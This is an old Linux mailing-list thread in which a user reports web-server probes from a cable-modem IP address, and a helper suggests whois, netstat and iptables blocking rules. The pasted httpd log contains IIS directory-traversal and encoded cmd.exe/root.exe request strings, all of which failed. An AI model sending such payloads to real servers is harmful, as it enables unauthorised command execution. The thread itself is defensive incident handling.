* Peer Stefan
Hi Patrick,
From: Patrick Shanahan [mailto:WideGlide@MyRealBox.com]
[snip]
[more snip]
Maybe, but I'd try to contact abuse@rr.com. Check for the e-mail address with "whois 24.208.133.143" ;-)
abuse@rr.com has been contacted also, but they do not want it. I help-chatted with a RR rep who apparently was reading from a script. He kept asking me if it was spam <grin>. Didn't know about firewall and httpd logs.
who is on the wrong end and also a RoadRunner user.
A Windows-User with open VNC-ports, open SMB-ports and some other interesting stuff :o)
What to do, what to do ??
Have a look at "netstat -an|grep 24.208.133.143" and check whether there is still an active connection.
Not at the moment, but I will check periodically during the day.
Please send the interesting part of your logfile to the list.
firewall: Mar 20 06:44:18 wahoo kernel: SuSE-FW-ACCEPT IN=eth0 OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=24.208.133.143 DST=192.168.0.2 LEN=48 TOS=0x08 PREC=0x00 TTL=121 ID=31653 DF PROTO=TCP SPT=1492 DPT=80 WINDOW=16384 RES=0x00 SYN URGP=0 OPT (020405B401010402) Mar 20 06:44:21 wahoo kernel: SuSE-FW-ACCEPT IN=eth0 OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=24.208.133.143 DST=192.168.0.2 LEN=48 TOS=0x08 PREC=0x00 TTL=121 ID=32087 DF PROTO=TCP SPT=1588 DPT=80 WINDOW=16384 RES=0x00 SYN URGP=0 OPT (020405B401010402) Mar 20 06:44:25 wahoo kernel: SuSE-FW-ACCEPT IN=eth0 OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=24.208.133.143 DST=192.168.0.2 LEN=48 TOS=0x08 PREC=0x00 TTL=121 ID=32532 DF PROTO=TCP SPT=1674 DPT=80 WINDOW=16384 RES=0x00 SYN URGP=0 OPT (020405B401010402) .... there are 11 similar lines httpd: 24.208.133.143 - - [20/Mar/2003:06:44:20 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 24.208.133.143 - - [20/Mar/2003:06:44:23 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 24.208.133.143 - - [20/Mar/2003:06:44:27 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 24.208.133.143 - - [20/Mar/2003:06:44:31 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 24.208.133.143 - - [20/Mar/2003:06:44:34 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 24.208.133.143 - - [20/Mar/2003:06:44:38 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 24.208.133.143 - - [20/Mar/2003:06:44:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 24.208.133.143 - - [20/Mar/2003:06:44:43 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 24.208.133.143 - - [20/Mar/2003:06:44:46 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 24.208.133.143 - - [20/Mar/2003:06:44:49 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 24.208.133.143 - - [20/Mar/2003:06:44:52 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 24.208.133.143 - - [20/Mar/2003:06:44:55 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 24.208.133.143 - - [20/Mar/2003:06:44:58 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 24.208.133.143 - - [20/Mar/2003:06:45:00 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 24.208.133.143 - - [20/Mar/2003:06:45:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 24.208.133.143 - - [20/Mar/2003:06:45:03 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
You can always try the next two commands. iptables -I INPUT -s 24.208.133.143 -j DROP iptables -I OUTPUT -d 24.208.133.143 -j DROP (Don't start the firewall services after entering the two commands.)
iptables -L | grep 24.208.133.143: DROP all -- dhcp024-208-133-143.insight.rr.com anywhere DROP all -- dhcp024-208-133-143.insight.rr.com anywhere DROP all -- anywhere dhcp024-208-133-143.insight.rr.com
If these don't help, I'd begin to check for rootkits and logging the network traffic between your host and the evil ip-address. But be careful - according to the hostname it's an DHCP-address, so it may be changing.
Will report back, tks -- Patrick Shanahan Please avoid TOFU and trim >quotes< http://wahoo.no-ip.org Registered Linux User #207535 icq#173753138 @ http://counter.li.org Linux, a continuous *learning* experience